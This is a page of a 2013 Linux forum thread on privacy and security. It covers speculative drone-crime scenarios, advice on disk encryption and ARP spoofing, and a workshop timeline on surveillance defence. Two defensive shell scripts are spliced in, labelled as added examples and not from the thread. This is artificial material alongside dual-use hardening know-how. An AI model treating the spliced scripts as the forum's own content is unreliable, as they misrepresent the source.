The future robber will not storm a bank like the Joker in a Batman movie, pump a shotgun, and ask the teller to place the money in a gray cloth bag. The future bank robber will send two drones from a remote location, one armed with a weapon or even explosives and the second drone with a hook, he will ask the teller to place the money in a bag and hook it to the second drone, or else the first drone will not be happy. The second drone will link up with the bank robber and be long gone, while the first drone will be left as a guarantee for a clean escape.
The future gang member, hit-man, or assassin will just mount a gun with a silencer on a drone and send it to your home, bypassing all your dogs/security cameras/traps/whatever. Take you out and leave no shred of evidence behind.
Police will be able to pinpoint you on the scene of the crime, with the weapon in your hand, and the prosecution will play a movie of the crime as it took place.
Tomorrow's soldiers and wars? Well, this is happening now.
Tomorrow's terrorist, well, this is where it gets interesting, but I'll just say pressure cookers will be considered as bows and arrows! A kid + drone will own you!

Hence, the measure of control that government always seeks is simply a reaction to counter all these threats and hope to keep an edge over the future bank robber/terrorist/whoever. 90% of it is just psychological warfare and tactics; the remaining 10% is real. Yes, one can argue that the mistakes of government are the reason many of these threats exist, but it is certainly not all of them.

The aim here in considering different points of view, is really for you as an individual to understand where you lie in all this, because at the bottom line that is the only thing that really matters.

------------
It might seem to you that this is a bit of science fiction, but I assure you that this is the very near future if we aren't living it right now. When I was a kid I built a go-kart with my dad, a mighty fast one smile, today's kids and fathers build drones.

Military, terrorism, and crime. FPSRussia. https://www.youtube.com/watch?v=SNPJMk2fgJU
Defcon 20: Hacker + Airplanes. http://www.youtube.com/watch?v=CXv1j3GbgLk
Watch Team Blacksheep's drone kissing lady liberty in NYC, or the French Paparazzi Drone. Journeyman. http://www.youtube.com/watch?v=20JCGDwBt7A
Robot Wars. Aljazeera. http://www.youtube.com/watch?v=TyJoJUs14bc
Drone facial recognition. Wired. http://www.wired.com/dangerroom/2011/09 … et-a-face/
Remote operation of drones (a soldier here operating a Reaper drone in Afghanistan). Aljazeera. http://www.youtube.com/watch?v=SdQvF5xmKL4
Domestic drones. Aljazeera. http://www.youtube.com/watch?v=QTLtNgSRXyc
Obama's drones. Aljazeera. http://www.youtube.com/watch?v=m36FYr8YBCI
Drones and civilians. Aljazeera. http://www.youtube.com/watch?v=B2j4K6-JKgs

You have 2 years tops until the relationship CCTV:Facebook will become Facebook:Drones.
You can play around with Facebook, create fake profiles, a fake social network, modify the metadata (GPS, time, etc.), spoof your IP, and upload a picture where Facebook/whoever thinks you are really in the North Pole. With drones, all bets are off!

------------
Sorry... a long way to make a point, and my weird brain operates by taking the long road: the "social-media section" should be removed entirely.
Replace it by a strong introduction that explains to user:
1. Total security and privacy do not exist.
2. Develop a strategy.
3. Establish control by using open-source software/hardware, and data/application encryption.
4. Use applications/services that implement principles of security and privacy by design.
    Do not expect privacy and security in services like Facebook, Twitter, Skype, Gmail, most of the cloud, apps on your iPhone/Android, IRC, Flash, etc.
    Understand that certain services come at a cost, and exactly what those costs are. Cost/benefit analysis.
        For example,
            phone: location, your communications, your voice signature, social interactions, relationships, movement patterns, etc.
            facebook: it depends what you put on it, but a facebook account used only to message people with encryption and VPN, can provide a lot more security and privacy than a phone.
            In other words, if you use and have a phone, it's okay for you to use Facebook, just try to keep your private thoughts private and to yourself as you pursue your gossiping/trolling/getting laid objectives smile

The body: solutions and solutions only. To your router, OS, applications, communications, data, common practices etc.

The rest: At your own risk! Enjoy what you have while it lasts!

------------
@wilde_wurst: cool and nifty little sucker! it made my day! smile

------------
Full-Disk Encryption:
    Create USB with /boot and grub. Back it up. Keep it safe.
    Use Tresor to save key on CPU debug buffer and not memory. (If your CPU supports it)
    Disable Firewire entirely or DMA part at least to avoid Tresor-Hunt attack.
    Now you can just pull the plug.

Offline
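
The FireWire/DMA and "if your CPU supports it" steps of the full-disk-encryption checklist above, as an added example that is not code from this thread or from the TRESOR project: a POSIX shell fragment that writes a modprobe blacklist for the Linux FireWire stack, reports whether the CPU advertises AES-NI (the flag TRESOR's in-CPU AES depends on), and lists any FireWire modules already loaded. File paths are parameters so the functions can be exercised against scratch copies of /proc/cpuinfo and /proc/modules; the module names are the standard Linux ones.

```shell
#!/bin/sh
# Added example (not from the thread): close the FireWire/DMA door that
# TRESOR-Hunt style key extraction walks through, and check CPU support.

# Standard Linux FireWire module names (new "firewire-*" stack and the
# legacy ieee1394 stack). Constructed list, nothing here is page-specific.
FIREWIRE_MODULES="firewire-core firewire-ohci firewire-sbp2 ohci1394 sbp2"

# write_firewire_blacklist FILE
# Emit a modprobe.d fragment. "blacklist" stops autoloading by alias;
# "install ... /bin/false" also defeats explicit modprobe and hotplug loads.
# In production FILE would be /etc/modprobe.d/no-firewire.conf.
write_firewire_blacklist() {
    out="$1"
    : > "$out"
    for m in $FIREWIRE_MODULES; do
        printf 'blacklist %s\ninstall %s /bin/false\n' "$m" "$m" >> "$out"
    done
}

# cpu_has_aesni CPUINFO_FILE
# Returns 0 when the first "flags" line lists "aes" (AES-NI present).
cpu_has_aesni() {
    grep '^flags' "$1" | head -n 1 | grep -qw aes
}

# loaded_firewire_modules PROC_MODULES_FILE
# Print FireWire modules currently loaded (names in /proc/modules use
# underscores); empty output means the stack is not resident.
loaded_firewire_modules() {
    awk '{print $1}' "$1" \
        | grep -E '^(firewire_(core|ohci|sbp2)|ohci1394|sbp2)$' || true
}

# Stand-alone run against the live system (requires root only to write
# into /etc/modprobe.d; the checks themselves are read-only).
if [ "${RUN_LIVE:-0}" = "1" ]; then
    write_firewire_blacklist /etc/modprobe.d/no-firewire.conf
    cpu_has_aesni /proc/cpuinfo && echo "AES-NI: yes" || echo "AES-NI: no"
    echo "Loaded FireWire modules:"; loaded_firewire_modules /proc/modules
fi
```

Blacklisting only prevents future loads; after writing the file, unload any modules the last function reports (or reboot) and, where the firmware offers it, disable the FireWire controller and enable the IOMMU as well.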

#97 2013-05-22 16:07:58

aphextwin
New Member
Registered: 2013-05-22
Posts: 2

Re: The paranoid #! Security Guide

Thanks to everyone on this thread for info.

Look at static ARP tables to prevent ARP spoofing/poisoning MITM.

Offline
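
The static-ARP tip above, as an added example that is not from the post: a POSIX shell fragment that pins the gateway's ARP entry as permanent with `ip neigh replace`, and a check that reads a saved `ip neigh show` dump and alerts when the gateway resolves to an unexpected MAC or one MAC claims several IPs (the usual footprint of a poisoning MITM). The gateway address, MAC and interface are constructed placeholders; `IP_CMD` is a hypothetical override so the pin can be dry-run without root.

```shell
#!/bin/sh
# Added example (not from the thread): static ARP pinning plus a small
# detector over `ip neigh show` output.

# pin_gateway_arp GW_IP GW_MAC IFACE
# A "permanent" neighbour entry is never overwritten by incoming ARP
# replies, so a spoofed "gateway is at <attacker MAC>" is ignored.
pin_gateway_arp() {
    "${IP_CMD:-ip}" neigh replace "$1" lladdr "$2" dev "$3" nud permanent
}

# check_arp_table DUMP_FILE GW_IP EXPECTED_GW_MAC
# DUMP_FILE holds lines like "192.0.2.1 dev eth0 lladdr 00:11:... REACHABLE".
# Prints an ALERT line per finding and exits 1 if anything looks poisoned.
check_arp_table() {
    awk -v gw="$2" -v want="$3" '
        {
            mac = ""
            for (i = 1; i <= NF; i++) if ($i == "lladdr") mac = $(i + 1)
            if (mac == "") next        # FAILED/INCOMPLETE entries carry no MAC
            mac = tolower(mac)
            if ($1 == gw && mac != tolower(want)) {
                print "ALERT gateway " gw " now resolves to " mac
                bad = 1
            }
            ips[mac] = (mac in ips) ? ips[mac] "," $1 : $1
            count[mac]++
        }
        END {
            for (m in count) if (count[m] > 1) {
                print "ALERT mac " m " claims " ips[m]
                bad = 1
            }
            exit bad ? 1 : 0
        }' "$1"
}

# Stand-alone run against the live table; values are constructed placeholders.
if [ "${RUN_LIVE:-0}" = "1" ]; then
    GW_IP=192.0.2.1; GW_MAC=00:11:22:33:44:55; IFACE=eth0
    pin_gateway_arp "$GW_IP" "$GW_MAC" "$IFACE"
    ip neigh show > /tmp/arp.dump
    check_arp_table /tmp/arp.dump "$GW_IP" "$GW_MAC" && echo "ARP table clean"
fi
```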

#98 2013-05-23 03:31:39

cyberhood
Member
Registered: 2012-07-19
Posts: 45

Re: The paranoid #! Security Guide

Jacob Appelbaum (Part 1/2) Digital Anti-Repression Workshop - April 26 2012
Filmed April 26, 2012, 12pm. Q & A workshop with Jacob Appelbaum, computer security researcher, on mobile phone security, cellphone forensics, state repression and surveillance.

Time Code/Description:
0:00 introduction
1:05 jake appelbaum introduction to the surveillance state.
5:00 metadata, data collection, linkability
9:40 cispa
10:40 national security letter (nsl)
14:25 2703d metadata notice 18 USC § 2703(d)
16:50 audience poll on cellphones and tracking
17:40 cellphone forensics, cellebrite device
20:30 bill binney nsa, linkability, traffic analysis
24:30 cisco
25:00 controlling the narrative
25:20 stylometry, anonymouth
28:35 traffic analysis
29:20 question on cellphone tampering
30:30 gov't backdoors, US v. Jones (2012), gps tracking
33:50 question on cellphone malware, defending against passive attacks. threat models beat cop vs. nsa
35:10 nsa electromagnetic tempest attack.
40:10 question on nypd, dhs, fbi, and nsa sigint capabilities
42:00 gnu radio, imsi catcher
44:38 broken window theory, resistance and activism
49:45 question on advocacy, rules, demands. answered with church committee, accountability, ron wyden commission, no secret laws, no warrantless wiretapping, no promotion of insecure systems allowing wiretapping, and story of
51:25 lethal flying robots, due process vs. judicial process.
56:00 question on basic do's and don'ts, practical tips. rubberhose filesystem, truecrypt, usefulness/practicality of deniability passphrases, transparency.
1:02:20 question of deniability, guilty until proven innocent.
1:04:15 mutually assured information destruction (maid)
1:05:00 getting around cryptography, powerline analysis attacks
1:07:10 building alternatives to commercial software and hardware. open software, open hardware, imsi catcher catcher.
1:11:40 calyx privacy-by-design isp.
1:12:55 tor network
1:15:00 mixmaster
1:16:20 tails debian

Jacob Appelbaum (Part 2/2) Digital Anti-Repression Workshop - April 26 2012
Time Code/Description
0:00 possible ways around on disclosing computer passwords by
2:20 using computer with no hard drive booting tails debian OS on usb stick
5:43 question on recommended websites for surveillance self-defense basics with mention of EFF and Tor Project
7:47 question on wiping hard drives, DBAN. also Ubuntu with encrypt option.
9:19 question on keyloggers, and outsmarting them; also a question on pranking the surveillance state/boosting morale.
10:25 WiebeTech's HotPlug mouse jiggler.
13:25 keyloggers phoning home.
15:12 mouse jiggler demo.
15:50 keyloggers phoning home cont'd.
17:04 Wireshark question.
19:25 tips on boosting morale, using humor, canned snakes, movie recommendations (The Lives of Others & Life Is Beautiful).
25:46 mutual aid and solidarity with those in more difficult situations.
28:01
29:00 Moxie Marlinspike RedPhone, ZRTP encrypted voip, private gsm
30:30 laser microphone & radar detector.
31:40 phone bag
32:48 TextSecure encrypted text messages for Android. Off The Record messaging OTR, Pretty Good Privacy; and differences between OTR and PGP; compartmentalization of keys. Socialist Millionaires' Protocol authentication. jitsi, pidgin, etc.
43:00 End-to-end encryption. FinFisher backdoor, Skype. Skype privacy concerns. Jitsi alternative.
45:44 Cryptophone
46:35 iphone vs. android. free software and hardware alternatives.
48:30 Sneak and Peek search warrants, black bag operation clandestine search. retina scanning.
50:23 cryptocat
50:45 guardian project
55:00
55:38 riseup advocacy. facebook vs. we.riseup.net Crabgrass, Piggipedia
58:18 counter-surveillance extremes.
1:00:10 basic laptop encryption. mac FileVault.
1:02:05 question/concern on keylogging software. assessing and compartmentalizing threats.
1:05:15 TOR presentation and advocacy
1:11:45 one limitation of tor.
1:12:20 fbi traffic confirmation attack.
1:12:58 mixmaster system high-latency anonymity network vs. tor; using mixmaster & tor together. Len Sassaman.
1:14:51 german police dsl upgrade attack. EvilGrade (spyware -and/or malware in general- introduction through upgrades).
1:16:50 question on facebook, traffic analysis.
1:18:15 question on tor exit node option
1:19:32 question on tor sdk.
1:20:32 question on recommendations for aboveground activists. building alternatives.
1:24:34 keystroke encrypters. vpn.

*edit* now hyperlinked! I started out linking to mostly just Wikipedia articles for the background stuff, which is what is covered in most of the first video. However, projects and software -extensively covered in the second video- are generally linked to their respective main sites. Enjoy!

Last edited by cyberhood (2013-05-25 03:25:04)

Offline

#99 2013-05-26 01:49:24

aphextwin
New Member
Registered: 2013-05-22
Posts: 2

Re: The paranoid #! Security Guide

Good long workshop, thanks.

I like Appelbaum's political ideology better than that of any other public-figure hacker I'm aware of, including Assange.

Did you see his keynote at the 29th Chaos Communications Congress? http://www.youtube.com/watch?v=Wl5OQz0Ko8c

Offline

#100 2013-05-26 06:25:24

locknlol
New Member
Registered: 2012-03-01
Posts: 4

Re: The paranoid #! Security Guide

Awesome thread, thanks for the great insight into Linux security. (Yay first post!)

Last edited by locknlol (2013-05-26 06:25:37)

Offline

Powered by FluxBB

Copyright © 2012 CrunchBang Linux.
Proudly powered by Debian. Hosted by Linode.
Debian is a registered trademark of Software in the Public Interest, Inc.